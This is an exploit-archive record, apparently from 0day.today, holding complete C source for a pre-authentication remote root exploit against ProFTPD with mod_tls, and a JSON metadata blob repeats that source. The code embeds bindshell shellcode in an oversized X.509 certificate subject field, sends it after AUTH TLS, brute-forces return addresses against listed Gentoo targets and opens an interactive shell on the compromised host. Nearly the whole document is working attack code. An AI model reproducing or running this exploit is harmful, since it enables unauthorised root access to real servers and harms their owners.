ID 1337DAY-ID-9013
Type zdt
Reporter netris
Modified 2007-08-24T00:00:00
Description
Exploit for linux platform in category remote exploits
===========================================================
ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit
===========================================================
/*
* *** Anti-modTLS-0day version 2 ***
*
* ProFTPd *.*.* + mod_tls remote-root-0day-exploit
*
* main advantages of this exploit:
* 1) No patched mod_tls versions yet
* 2) This is a preauthentication bug
* 3) Bruteforcing option (eheheheee)
* main disadvantages:
* 2) Target mechanism isn't very well, cause exploitation
* depends on library mapped address, so, there are no
* strict categories.
* 1) Dunno, if there are a lot of proftpd+mod_tls boxes
* outta there.
*
* Bug found by: netris
* exploit written by: netris
*
* -- ADD --
*
* Hi there. Here goes the original exploit written in 2004
* (not in 2006 like some of you would guess), and found by
* netris, not Evgeny Legerov. Big middle fingers to those
* who fight for commercial security shit system.
* Greets to arpunk, pandzilla, c0dak, mcb, c0de, ^sq, disque,
* gamma, djang0 and many others of ex #phenoelit channel.
*
* netris.
*
* mailto: [email protected]
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <getopt.h>
#include <netdb.h>
#include <openssl/ssl.h>
#include <openssl/ssl3.h>
#include <openssl/x509.h>
#include <openssl/err.h>
#define CODE_SZ 2322
#define DPORT 21
#define BSET(u,a,b,c,d) u = a*0x1000000;\
u+= b*0x0010000;\
u+= c*0x0000100;\
u+= d*0x0000001;
#define checkz(a) int i;\
for(i=0;i<4;i++){\
if(a[i]<0x20)a[i]=0x20;\
if(a[i]>0x7f)a[i]=0x7f;\
}
int ch,timeout=2,br=0;
struct ADDR{
char *os;
unsigned long call_reg; /* eax or edx */
};
/*bindshell, port 36864, offset 265, buf address is edx */
char shellcode[]="h22ImX522ImHRWPPSRPPaVUWWTBfRJfhdEfXf5YDfPDfh0PDTY09RUajWY"
"0Loa0toafhoXfYf1LocjxY0Loe0Toe0ToffhH0fYf1Loh0tojjFY0Lok0t"
"ok0tolfht9fXf1Don0TopjyX0Dor0TosjKX0Dou0Tov0ToxjIX0Doy0Toy"
"G0tozGGfhsCfYf1LozGG0tozGGjZY0LozGGjkX0Doz0TozGGjGX0Doz0To"
"zG0tozGGjAY0LozGf1tozGGG0tozGGjpY0LozG0tozGGjpY0LozG0TozGG"
"jfX0DozG0tozGGjRX0DozG0tozGG0TozGj8Y0Loz0tozG0TozGfhlGfYf1"
"LozGGGG0TozGG0TozGj3Y0Loz0tozG0tozGGjuX0DozG0TozGGjyY0LozG"
"0tozGGG0tozGj4Y0Loz0tozG0TozGjqX0Doz0tozG0tozGfhyCfXf1DozG"
"Gf1tozGGjFY0Loz0TozG0TozGjQY0LozGG0tozGj9Y0Loz0TozG0TozGjY"
"X0DozGG0tozGjFX0Doz0TozG0tozGGjnY0LozG0TozGGjTY0LozG0tozGj"
"gY0Loz0TozG0tozGGj4Y0LozG0TozGj9X0DozG0tozGfhKofYf1Lozf1to"
"zGG0tozGfha5fXf1Dozf1TozGGj4X0Doz0TozGjYY0LozGGGGjHY0LozCn"
"1qGvFXpvzvFxyvFqrNCOf26C9FcSwFR1T1jvFYOofvFfrNdvNjrNZOf2Gv"
"2KCCOf2LvVyvViOfC2KyMOFj629OnA2FOfA29wVivvXxkrK8O224xra54v"
"bingsh";
X509 *Create_Death_Certificate(EVP_PKEY **pkey);
void set_subject(X509 *cert, X509_NAME *subject, X509_NAME *issuer);
void DUF_add_entry(X509_NAME **subiss, char *field,
unsigned char *bytes, int len);
void setaddr(char *hname, struct sockaddr_in *sap, int port);
void senddata(int sock, char *data);
int shell(char *host,int port, struct sockaddr_in ad);
void help(char *prname);
SSL_CTX *ctx;
SSL *conn;
int sk;
void handler(){
if(!conn->in_handshake){
SSL_shutdown(conn);
SSL_free(conn);
}
close(sk);
exit(0);
}
void step(char *str, int err){
static i;
if(br)
return;
switch(err){
case 0:
fprintf(stderr,"[%03d] %s\n",i+1,str);
i++;break;
case -1:
fprintf(stderr,"[!!!] %s\n",str);
break;
case 1:
fprintf(stderr,"[!!!] %s\n\t",str);
ERR_print_errors_fp(stderr);
}
}
/* Add targets here */
struct ADDR vict[]={
{"Bruteforce mode",0x40202020},
{"Gentoo Linux 1.4 3.2.3-r1 - openssl-0.9.7d",0x40235727},
{"Gentoo Linux 1.4.3.2.3-r1 - default install",0x40283a43},
{0}
};
int main(int argc, char *argv[])
{
int port=DPORT,aa[4];
char *host,*sport,opt;
unsigned long saddr=0;
struct sockaddr_in a;
EVP_PKEY *key;
X509 *cert=NULL;
fprintf(stderr,"--< rebel-proftpd-modtls-0day\n");
fprintf(stderr,"--< netris @ duffsrebelz\n\n");
while((opt=getopt(argc,(void*)argv,"+b:t:x"))!=-1)
switch(opt){
case 't':timeout=atoi(optarg);break;
case 'b':sscanf(optarg,"0x%x",&saddr);break;
case 'x':ch=1;
X509_print_fp(stderr,
Create_Death_Certificate(&key));
exit(0);
default:help(argv[0]);
}
if(argc-optind!=2)
help(argv[0]);
ch=atoi(argv[optind]);
if(host=strchr(argv[optind+1],':')){
if(!isdigit(*(host+1))){
step("weird arguments\n",-1);
exit(-1);
}
host = strtok(argv[optind+1],":");
sport = strtok(NULL,":");
port=atoi(sport);
}else
host=argv[optind+1];
(ch==0)?(br=1):(br=0);
SSL_library_init();
if(br)
fprintf(stderr,
"--< Ready, Steady, GO!!! >:O\n\n");
setaddr(host,&a,port);
if(!saddr)saddr=vict[0].call_reg;
aa[3] = (saddr >> 0) & 0xff;
aa[2] = (saddr >> 8) & 0xff;
aa[1] = (saddr >> 16) & 0xff;
aa[0] = (saddr >> 24) & 0xff;
checkz(aa);
for(;;){
for(;aa[1]<0x7e;aa[1]++){
for(;aa[2]<0x7e;aa[2]++){
for(;aa[3]<0x7e;aa[3]++){
BSET(vict[0].call_reg,aa[0],aa[1],aa[2],aa[3]);
fprintf(stderr,"[0x%08x]\n",vict[0].call_reg);
sk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
cert = Create_Death_Certificate(&key);
a.sin_port=htons(port);
a.sin_family=AF_INET;
if((connect(sk,(struct sockaddr*)&a,sizeof(a)))<0){
fprintf(stderr,"[!!!] couldn't connect\n\n");
close(sk);
exit(-1);
}
senddata(sk,"AUTH TLS\n");
ctx = SSL_CTX_new(SSLv23_client_method());
SSL_CTX_use_certificate(ctx, cert);
SSL_CTX_use_PrivateKey(ctx, key);
conn = SSL_new(ctx);
SSL_set_connect_state(conn);
SSL_set_fd(conn,sk);
signal(SIGINT,handler);
step("establishing SSL connection",0);
#ifdef DEBUG
getc(stdin);
#endif
if(SSL_connect(conn)<0){
fprintf(stderr,"[!!!] No SSL enabled on %s\n\n",host);
exit(-1);
}
step("shell spawn...",0);
if(shell(host,36864,a))
exit(0);
step("done, see ya later\n",0);
X509_free(cert);
if(!conn->in_handshake){
SSL_shutdown(conn);
SSL_free(conn);
}
}aa[3]=0x20;
}aa[2]=0x20;
}aa[1]=0x20;
}
return 0;
}
X509 *Create_Death_Certificate(EVP_PKEY **key)
{
FILE *fd;
time_t t;
X509_NAME *subject=NULL;
X509_NAME *issuer=NULL;
ASN1_TIME *tbefore,*tafter;
ASN1_INTEGER *serial;
X509 *dz; /* certificate */
RSA *rsa;
EVP_PKEY *pk;
step("preparing dirty certificate",0);
dz = X509_new();
/* private-key generation */
pk = EVP_PKEY_new();
rsa = RSA_generate_key(1024, RSA_F4, NULL,NULL);
EVP_PKEY_assign_RSA(pk,rsa);
X509_set_pubkey(dz,pk);
/* version/serial */
X509_set_version(dz,0x2); /* version: 3 */
serial = ASN1_INTEGER_new();
ASN1_INTEGER_set(serial,0x01);
X509_set_serialNumber(dz, serial);
/* not-before/notafter validity */
tbefore = ASN1_TIME_new();
tafter = ASN1_TIME_new();
ASN1_TIME_set(tbefore,t=0);
ASN1_TIME_set(tafter,t=60*60*24*366*65);
X509_set_notBefore(dz, tbefore);
X509_set_notAfter(dz, tafter);
/* DN Subject/Issuer */
set_subject(dz,subject,issuer);
/* let's make it self signed */
X509_sign(dz, pk, EVP_md5());
*key=pk;
X509_NAME_free(subject);
ASN1_INTEGER_free(serial);
ASN1_TIME_free(tbefore);
ASN1_TIME_free(tafter);
close(fd);
return dz;
}
/* <soletario> yeah man */
void set_subject(X509 *cert, X509_NAME *subject, X509_NAME *issuer)
{
int i;
char dc0de[6000];
memset(dc0de,0,sizeof(dc0de));
for(i=0; i<5000-1; i++)
dc0de[i]='E';
for(i=258; i<258+sizeof(shellcode)-1; i++)
dc0de[i]=shellcode[i-258];
i+=1;
for(; i<3200; i+=4){ /* uhh, rude */
dc0de[i+0]=(vict[ch].call_reg >> 0) & 0xff;
dc0de[i+1]=(vict[ch].call_reg >> 8) & 0xff;
dc0de[i+2]=(vict[ch].call_reg >>16) & 0xff;
dc0de[i+3]=(vict[ch].call_reg >>24) & 0xff;
}
subject = X509_get_subject_name(cert);
issuer = X509_get_issuer_name(cert);
DUF_add_entry(&subject,"host",dc0de,-1);
X509_set_subject_name(cert,subject);
X509_NAME_delete_entry(issuer,0);
X509_set_issuer_name(cert,issuer);
}
/* This function can insert large fields */
void DUF_add_entry(X509_NAME **subiss, char *field,
unsigned char *bytes, int len)
{
ASN1_OBJECT *obj;
X509_NAME_ENTRY *ne;
ne=X509_NAME_ENTRY_new();
obj=OBJ_txt2obj(field,0);
X509_NAME_ENTRY_set_object(ne,obj);
ASN1_mbstring_ncopy(&ne->value,bytes,len,MBSTRING_ASC,0,0,0);
X509_NAME_add_entry(*subiss,ne,-1,0);
}
void setaddr(char *hname, struct sockaddr_in *sap, int port)
{
struct hostent *hp;
memset(sap,0,sizeof(*sap));
sap->sin_family = AF_INET;
if(!inet_aton(hname,&sap->sin_addr)){
hp = gethostbyname(hname);
if(hp == NULL){
step("unkown host",-1);
return;
}
sap->sin_addr = *(struct in_addr *)hp->h_addr;
}else
sap->sin_addr.s_addr = inet_addr(hname);
sap->sin_port = htons(port);
}
int shell(char *host, int port, struct sockaddr_in ad)
{
u_char buf[4096];
fd_set fds;
int sock;
struct sockaddr_in a=ad;
sock = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
a.sin_family = AF_INET;
a.sin_port = htons(port);
if((connect(sock,(struct sockaddr*)&a,sizeof(a)))<0){
step("couldn't connect\n",-1);
close(sock);
if(!br)
handler();
else return 0;
}
signal(SIGINT,SIG_IGN);
fprintf(stderr,"\n--< %s just has been 0wned\n\n",host);
for (;;){
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
fprintf(stderr,"\033[31m[duffshell]#\033[0m ");
select(255, &fds, NULL, NULL, NULL);
memset(buf, 0, sizeof(buf));
if (FD_ISSET(sock, &fds)){
read(sock, buf, sizeof(buf));
fprintf(stderr, "%s", buf);
}
if (FD_ISSET(0, &fds)){
read(0, buf, sizeof(buf));
if(strstr(buf,"exit")){
fprintf(stderr,"\n");
return 1;
}
write(sock, buf, strlen(buf));
}
}
}
void senddata(int sock, char *data)
{
int i,c=0,j;
char au[4];
fd_set ff;
struct timeval tm;
int r;
FD_ZERO(&ff);
FD_SET(sock,&ff);
tm.tv_sec = timeout;
tm.tv_usec = 30;
memset(au,0,4);
if(data){
j=0;
send(sock,data,strlen(data),0);
for(;;){
if(!(r=select(sock+1,&ff,NULL,NULL,&tm)))
break;
if((i=read(sock,&c,1))<=0)
break;
}
}
}
void help(char *prname)
{
int i=0;
fprintf(stderr,"usage: %s target hostname:[port]\n",prname);
fprintf(stderr," -t <delay> :delay of data send/recv\n");
fprintf(stderr," -b <addr> :bruteforce starting address\n");
fprintf(stderr," -x :just the payload certificate and exit\n");
fprintf(stderr,"current targets:\n");
for(i=0;vict[i].call_reg;i++)
fprintf(stderr," %d) %s ( %08x )\n",i,
vict[i].os,
vict[i].call_reg);
putc('\n',stderr);
exit(-1);
}
# 0day.today [2018-01-09] #
{"id": "1337DAY-ID-9013", "type": "zdt", "bulletinFamily": "exploit", "title": "ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit", "description": "Exploit for linux platform in category remote exploits", "published": "2007-08-24T00:00:00", "modified": "2007-08-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/9013", "reporter": "netris", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-10T01:07:16", "viewCount": 5, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://0day.today/exploit/9013", "sourceData": "===========================================================\r\nProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit\r\n===========================================================\r\n\r\n/* \r\n *\t*** Anti-modTLS-0day version 2 ***\r\n *\r\n * ProFTPd *.*.* + mod_tls remote-root-0day-exploit\r\n * \r\n * main advantages of this exploit:\r\n *\t1) No patched mod_tls versions yet\r\n *\t2) This is a preauthentication bug\r\n *\t3) Bruteforcing option (eheheheee)\r\n * main disadvantages:\r\n *\t2) Target mechanism isn't very well, cause exploitation\r\n *\t depends on library mapped address, so, there are no\r\n *\t strict categories.\r\n *\t1) Dunno, if there are a lot of proftpd+mod_tls boxes\r\n *\t outta there.\r\n *\r\n * Bug found by: netris\r\n * exploit written by: netris \r\n *\r\n * -- ADD --\r\n *\r\n * Hi there. Here goes the original exploit written in 2004 \r\n * (not in 2006 like some of you would guess), and found by\r\n * netris, not Evgeny Legerov. Big middle fingers to those\r\n * who fight for commercial security shit system. \r\n * Greets to arpunk, pandzilla, c0dak, mcb, c0de, ^sq, disque,\r\n * gamma, djang0 and many others of ex #phenoelit channel.\r\n * \r\n * netris.\r\n *\r\n * mailto: [email\u00a0protected]\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <signal.h>\r\n#include <getopt.h>\r\n#include <netdb.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/ssl3.h>\r\n#include <openssl/x509.h>\r\n#include <openssl/err.h>\r\n\r\n#define CODE_SZ 2322\r\n#define DPORT 21\r\n\r\n#define BSET(u,a,b,c,d) u = a*0x1000000;\\\r\n\t\t\tu+= b*0x0010000;\\\r\n\t\t\tu+= c*0x0000100;\\\r\n\t\t\tu+= d*0x0000001;\r\n\r\n#define checkz(a) int i;\\\r\n\t\t for(i=0;i<4;i++){\\\r\n\t\t \tif(a[i]<0x20)a[i]=0x20;\\\r\n\t\t\tif(a[i]>0x7f)a[i]=0x7f;\\\r\n\t\t }\r\n\r\nint ch,timeout=2,br=0;\r\n struct ADDR{\r\n \tchar *os;\r\n unsigned long call_reg; /* eax or edx */\r\n};\r\n\r\n/*bindshell, port 36864, offset 265, buf address is edx */\r\nchar shellcode[]=\"h22ImX522ImHRWPPSRPPaVUWWTBfRJfhdEfXf5YDfPDfh0PDTY09RUajWY\"\r\n\t\t \"0Loa0toafhoXfYf1LocjxY0Loe0Toe0ToffhH0fYf1Loh0tojjFY0Lok0t\"\r\n\t\t \"ok0tolfht9fXf1Don0TopjyX0Dor0TosjKX0Dou0Tov0ToxjIX0Doy0Toy\"\r\n\t\t \"G0tozGGfhsCfYf1LozGG0tozGGjZY0LozGGjkX0Doz0TozGGjGX0Doz0To\"\r\n\t\t \"zG0tozGGjAY0LozGf1tozGGG0tozGGjpY0LozG0tozGGjpY0LozG0TozGG\"\r\n\t\t \"jfX0DozG0tozGGjRX0DozG0tozGG0TozGj8Y0Loz0tozG0TozGfhlGfYf1\"\r\n\t\t \"LozGGGG0TozGG0TozGj3Y0Loz0tozG0tozGGjuX0DozG0TozGGjyY0LozG\"\r\n\t\t \"0tozGGG0tozGj4Y0Loz0tozG0TozGjqX0Doz0tozG0tozGfhyCfXf1DozG\"\r\n\t\t \"Gf1tozGGjFY0Loz0TozG0TozGjQY0LozGG0tozGj9Y0Loz0TozG0TozGjY\"\r\n\t\t \"X0DozGG0tozGjFX0Doz0TozG0tozGGjnY0LozG0TozGGjTY0LozG0tozGj\"\r\n\t\t \"gY0Loz0TozG0tozGGj4Y0LozG0TozGj9X0DozG0tozGfhKofYf1Lozf1to\"\r\n\t\t \"zGG0tozGfha5fXf1Dozf1TozGGj4X0Doz0TozGjYY0LozGGGGjHY0LozCn\"\r\n\t\t \"1qGvFXpvzvFxyvFqrNCOf26C9FcSwFR1T1jvFYOofvFfrNdvNjrNZOf2Gv\"\r\n\t\t \"2KCCOf2LvVyvViOfC2KyMOFj629OnA2FOfA29wVivvXxkrK8O224xra54v\"\r\n\t\t \"bingsh\";\r\n\r\nX509 *Create_Death_Certificate(EVP_PKEY **pkey);\r\nvoid set_subject(X509 *cert, X509_NAME *subject, X509_NAME *issuer);\r\nvoid DUF_add_entry(X509_NAME **subiss, char *field, \r\n\t\t\tunsigned char *bytes, int len);\r\nvoid setaddr(char *hname, struct sockaddr_in *sap, int port);\r\nvoid senddata(int sock, char *data); \r\nint shell(char *host,int port, struct sockaddr_in ad);\r\nvoid help(char *prname);\r\n\r\nSSL_CTX *ctx;\r\nSSL *conn;\r\nint sk;\r\n\r\nvoid handler(){\r\n\tif(!conn->in_handshake){\r\n\t\tSSL_shutdown(conn);\r\n\t\tSSL_free(conn);\r\n\t}\r\n\tclose(sk);\r\n\texit(0);\r\n}\r\n\r\nvoid step(char *str, int err){\r\n\tstatic i;\r\n\tif(br)\r\n\t\treturn;\r\n\tswitch(err){\r\n\t\tcase 0:\r\n\t\t\tfprintf(stderr,\"[%03d] %s\\n\",i+1,str);\r\n\t\t\ti++;break;\r\n\t\tcase -1:\r\n\t\t\tfprintf(stderr,\"[!!!] %s\\n\",str);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\tfprintf(stderr,\"[!!!] %s\\n\\t\",str);\r\n\t\t\tERR_print_errors_fp(stderr);\r\n\t}\r\n}\r\n/* Add targets here */\r\nstruct ADDR vict[]={\r\n\t{\"Bruteforce mode\",0x40202020},\r\n\t{\"Gentoo Linux 1.4 3.2.3-r1 - openssl-0.9.7d\",0x40235727},\r\n\t{\"Gentoo Linux 1.4.3.2.3-r1 - default install\",0x40283a43},\t\r\n\t{0}\r\n};\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tint port=DPORT,aa[4];\r\n\tchar *host,*sport,opt;\r\n\tunsigned long saddr=0;\r\n\tstruct sockaddr_in a;\r\n\r\n\tEVP_PKEY *key;\r\n\tX509 *cert=NULL;\r\n\r\n\tfprintf(stderr,\"--< rebel-proftpd-modtls-0day\\n\");\r\n\tfprintf(stderr,\"--< netris @ duffsrebelz\\n\\n\");\r\n\t\r\n\twhile((opt=getopt(argc,(void*)argv,\"+b:t:x\"))!=-1)\r\n\t\tswitch(opt){\r\n\t\t\tcase 't':timeout=atoi(optarg);break;\r\n\t\t\tcase 'b':sscanf(optarg,\"0x%x\",&saddr);break;\r\n\t\t\tcase 'x':ch=1;\r\n\t\t\t\tX509_print_fp(stderr,\r\n\t\t\t\t\tCreate_Death_Certificate(&key));\r\n\t\t\t\texit(0);\r\n\t\t\tdefault:help(argv[0]);\r\n\t\t}\r\n\tif(argc-optind!=2)\r\n\t\thelp(argv[0]);\r\n\t\r\n\tch=atoi(argv[optind]);\r\n\t\r\n\tif(host=strchr(argv[optind+1],':')){\r\n\t\tif(!isdigit(*(host+1))){\r\n\t\t\tstep(\"weird arguments\\n\",-1);\r\n\t\t\texit(-1);\r\n\t\t}\r\n\t\thost = strtok(argv[optind+1],\":\");\r\n\t\tsport = strtok(NULL,\":\");\r\n\t\tport=atoi(sport);\r\n\t}else\r\n\t\thost=argv[optind+1];\r\n\t\r\n\t(ch==0)?(br=1):(br=0);\r\n\t\r\n\tSSL_library_init();\t\r\n\tif(br)\r\n\t\tfprintf(stderr,\r\n\t\t\t\"--< Ready, Steady, GO!!! >:O\\n\\n\");\r\n\tsetaddr(host,&a,port);\r\n\r\n\tif(!saddr)saddr=vict[0].call_reg;\r\n\t\r\n\taa[3] = (saddr >> 0) & 0xff;\r\n\taa[2] = (saddr >> 8) & 0xff;\r\n\taa[1] = (saddr >> 16) & 0xff;\r\n\taa[0] = (saddr >> 24) & 0xff;\r\n\t\r\n\tcheckz(aa);\r\n\t\r\n\tfor(;;){\r\n\tfor(;aa[1]<0x7e;aa[1]++){\r\n\t\tfor(;aa[2]<0x7e;aa[2]++){\r\n\t\t\tfor(;aa[3]<0x7e;aa[3]++){\r\n\tBSET(vict[0].call_reg,aa[0],aa[1],aa[2],aa[3]);\r\n\tfprintf(stderr,\"[0x%08x]\\n\",vict[0].call_reg);\r\n\tsk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\t\t\r\n\t\r\n\tcert = Create_Death_Certificate(&key);\r\n\ta.sin_port=htons(port);\r\n\ta.sin_family=AF_INET;\r\n\tif((connect(sk,(struct sockaddr*)&a,sizeof(a)))<0){\r\n\t\tfprintf(stderr,\"[!!!] couldn't connect\\n\\n\");\r\n\t\tclose(sk);\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tsenddata(sk,\"AUTH TLS\\n\");\r\n\t\r\n\tctx = SSL_CTX_new(SSLv23_client_method());\r\n\tSSL_CTX_use_certificate(ctx, cert);\r\n\tSSL_CTX_use_PrivateKey(ctx, key);\r\n\r\n\tconn = SSL_new(ctx);\r\n\tSSL_set_connect_state(conn);\r\n\tSSL_set_fd(conn,sk);\r\n\tsignal(SIGINT,handler);\r\n\tstep(\"establishing SSL connection\",0);\r\n#ifdef DEBUG\r\n\tgetc(stdin);\r\n#endif\r\n\tif(SSL_connect(conn)<0){\r\n\t\tfprintf(stderr,\"[!!!] No SSL enabled on %s\\n\\n\",host);\r\n\t\texit(-1);\r\n\t}\r\n\tstep(\"shell spawn...\",0);\r\n\tif(shell(host,36864,a))\r\n\t\texit(0);\r\n\t\r\n\tstep(\"done, see ya later\\n\",0);\r\n\tX509_free(cert);\r\n\tif(!conn->in_handshake){\r\n\t\tSSL_shutdown(conn);\r\n\t\tSSL_free(conn);\r\n\t}\t\t\t\t\t\t\r\n\t}aa[3]=0x20;\r\n\t}aa[2]=0x20;\r\n\t}aa[1]=0x20;\r\n\t}\r\n\treturn 0;\r\n}\r\n\r\nX509 *Create_Death_Certificate(EVP_PKEY **key)\r\n{\r\n\tFILE *fd;\r\n\ttime_t t;\r\n\r\n\tX509_NAME *subject=NULL;\r\n\tX509_NAME *issuer=NULL;\r\n\tASN1_TIME *tbefore,*tafter;\r\n\tASN1_INTEGER *serial;\r\n\tX509 *dz; /* certificate */\r\n\tRSA *rsa;\r\n\tEVP_PKEY *pk;\r\n\t\r\n\tstep(\"preparing dirty certificate\",0);\r\n\r\n \tdz = X509_new();\r\n\t\r\n\t/* private-key generation */\r\n \tpk = EVP_PKEY_new();\r\n \trsa = RSA_generate_key(1024, RSA_F4, NULL,NULL); \r\n \tEVP_PKEY_assign_RSA(pk,rsa);\r\n\tX509_set_pubkey(dz,pk);\r\n\t\r\n\t/* version/serial */\r\n \tX509_set_version(dz,0x2); /* version: 3 */\r\n\tserial = ASN1_INTEGER_new();\r\n \tASN1_INTEGER_set(serial,0x01);\r\n\tX509_set_serialNumber(dz, serial); \r\n\t\t\r\n\t/* not-before/notafter validity */\r\n\ttbefore = ASN1_TIME_new();\r\n\ttafter = ASN1_TIME_new();\r\n\tASN1_TIME_set(tbefore,t=0);\r\n\tASN1_TIME_set(tafter,t=60*60*24*366*65);\r\n \tX509_set_notBefore(dz, tbefore);\r\n \tX509_set_notAfter(dz, tafter); \r\n\t\r\n\t/* DN Subject/Issuer */\r\n\tset_subject(dz,subject,issuer);\r\n\r\n\t/* let's make it self signed */\r\n\tX509_sign(dz, pk, EVP_md5());\r\n\t\r\n\t*key=pk;\r\n\tX509_NAME_free(subject);\r\n\tASN1_INTEGER_free(serial);\r\n\tASN1_TIME_free(tbefore);\r\n\tASN1_TIME_free(tafter);\r\n\tclose(fd);\r\n\treturn dz;\r\n}\r\n\r\n/* <soletario> yeah man */ \r\nvoid set_subject(X509 *cert, X509_NAME *subject, X509_NAME *issuer)\r\n{\r\n\tint i;\r\n\tchar dc0de[6000];\r\n\t\r\n\tmemset(dc0de,0,sizeof(dc0de));\r\n\t\t\r\n\tfor(i=0; i<5000-1; i++)\r\n\t\tdc0de[i]='E';\r\n\tfor(i=258; i<258+sizeof(shellcode)-1; i++)\r\n\t\tdc0de[i]=shellcode[i-258];\r\n\ti+=1;\r\n\tfor(; i<3200; i+=4){ /* uhh, rude */\r\n\t\tdc0de[i+0]=(vict[ch].call_reg >> 0) & 0xff;\r\n\t\tdc0de[i+1]=(vict[ch].call_reg >> 8) & 0xff;\r\n\t\tdc0de[i+2]=(vict[ch].call_reg >>16) & 0xff;\r\n\t\tdc0de[i+3]=(vict[ch].call_reg >>24) & 0xff;\r\n\t}\r\n\tsubject = X509_get_subject_name(cert);\r\n\tissuer = X509_get_issuer_name(cert);\t\r\n\t\r\n\tDUF_add_entry(&subject,\"host\",dc0de,-1);\r\n\r\n\tX509_set_subject_name(cert,subject);\r\n\tX509_NAME_delete_entry(issuer,0);\r\n\tX509_set_issuer_name(cert,issuer);\r\n}\r\n\r\n/* This function can insert large fields */\r\nvoid DUF_add_entry(X509_NAME **subiss, char *field, \r\n\t\t\tunsigned char *bytes, int len)\r\n{\r\n\tASN1_OBJECT *obj;\r\n\tX509_NAME_ENTRY *ne;\r\n\t\r\n\tne=X509_NAME_ENTRY_new();\t\r\n\tobj=OBJ_txt2obj(field,0);\r\n\tX509_NAME_ENTRY_set_object(ne,obj);\r\n\tASN1_mbstring_ncopy(&ne->value,bytes,len,MBSTRING_ASC,0,0,0);\t\r\n\tX509_NAME_add_entry(*subiss,ne,-1,0);\r\n}\r\n\r\nvoid setaddr(char *hname, struct sockaddr_in *sap, int port)\r\n{\r\n\tstruct hostent *hp;\r\n\r\n\tmemset(sap,0,sizeof(*sap));\r\n\tsap->sin_family = AF_INET;\r\n\r\n\tif(!inet_aton(hname,&sap->sin_addr)){\r\n\t\thp = gethostbyname(hname);\r\n\t\tif(hp == NULL){\r\n\t\t\tstep(\"unkown host\",-1);\r\n\t\t\treturn;\r\n\t\t}\r\n\t\tsap->sin_addr = *(struct in_addr *)hp->h_addr;\r\n\t}else\r\n\t\tsap->sin_addr.s_addr = inet_addr(hname);\r\n\t\r\n\tsap->sin_port = htons(port);\r\n}\r\n\r\nint shell(char *host, int port, struct sockaddr_in ad)\r\n{\r\n\tu_char buf[4096];\r\n \tfd_set fds;\r\n\tint sock;\r\n\tstruct sockaddr_in a=ad;\r\n\t\r\n\tsock = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);\r\n\t\r\n\ta.sin_family = AF_INET;\r\n\ta.sin_port = htons(port);\r\n\r\n\tif((connect(sock,(struct sockaddr*)&a,sizeof(a)))<0){\r\n\t\t\t step(\"couldn't connect\\n\",-1);\r\n\t\t\t close(sock);\r\n\t\t\t if(!br)\r\n\t\t\t \thandler();\r\n\t\t\t else return 0;\r\n\t}\r\n\tsignal(SIGINT,SIG_IGN);\r\n\tfprintf(stderr,\"\\n--< %s just has been 0wned\\n\\n\",host);\t\r\n for (;;){\r\n\t\tFD_ZERO(&fds);\r\n\t\tFD_SET(0, &fds);\r\n\t\tFD_SET(sock, &fds);\r\n\t\tfprintf(stderr,\"\\033[31m[duffshell]#\\033[0m \");\r\n\t\tselect(255, &fds, NULL, NULL, NULL);\r\n\t\tmemset(buf, 0, sizeof(buf));\r\n\t\t\r\n\t\tif (FD_ISSET(sock, &fds)){\r\n\t\t\tread(sock, buf, sizeof(buf));\r\n\t\t\tfprintf(stderr, \"%s\", buf);\r\n\t\t}\r\n\t\tif (FD_ISSET(0, &fds)){\r\n\t\t\tread(0, buf, sizeof(buf));\r\n\t\t\tif(strstr(buf,\"exit\")){\r\n\t\t\t\tfprintf(stderr,\"\\n\");\r\n\t\t\t\treturn 1;\r\n\t\t\t}\r\n\t\t\twrite(sock, buf, strlen(buf)); \r\n\t\t} \r\n\t}\r\n}\r\n\r\nvoid senddata(int sock, char *data)\r\n{\r\n\tint i,c=0,j;\r\n\tchar au[4];\r\n\tfd_set ff;\r\n\tstruct timeval tm;\r\n\tint r;\r\n\t\r\n\tFD_ZERO(&ff);\r\n\tFD_SET(sock,&ff);\r\n\ttm.tv_sec = timeout;\r\n\ttm.tv_usec = 30;\r\n\tmemset(au,0,4);\r\n\t\r\n\tif(data){\r\n\t\tj=0;\r\n\t\t\tsend(sock,data,strlen(data),0);\r\n\t\tfor(;;){\r\n\t\t\tif(!(r=select(sock+1,&ff,NULL,NULL,&tm)))\r\n\t\t\t\tbreak;\r\n\t\t\tif((i=read(sock,&c,1))<=0)\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n}\r\n\r\nvoid help(char *prname)\r\n{\r\n\tint i=0;\r\n\tfprintf(stderr,\"usage: %s target hostname:[port]\\n\",prname);\r\n\tfprintf(stderr,\" -t <delay> :delay of data send/recv\\n\");\r\n\tfprintf(stderr,\" -b <addr> :bruteforce starting address\\n\");\r\n\tfprintf(stderr,\" -x :just the payload certificate and exit\\n\");\r\n\tfprintf(stderr,\"current targets:\\n\");\r\n\tfor(i=0;vict[i].call_reg;i++)\r\n\t\tfprintf(stderr,\" %d) %s ( %08x )\\n\",i,\r\n\t\t\t\t\t vict[i].os,\r\n\t\t\t\t\t vict[i].call_reg);\r\n\tputc('\\n',stderr);\r\n\texit(-1);\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-09] #", "_state": {"dependencies": 1645295053}}
{}
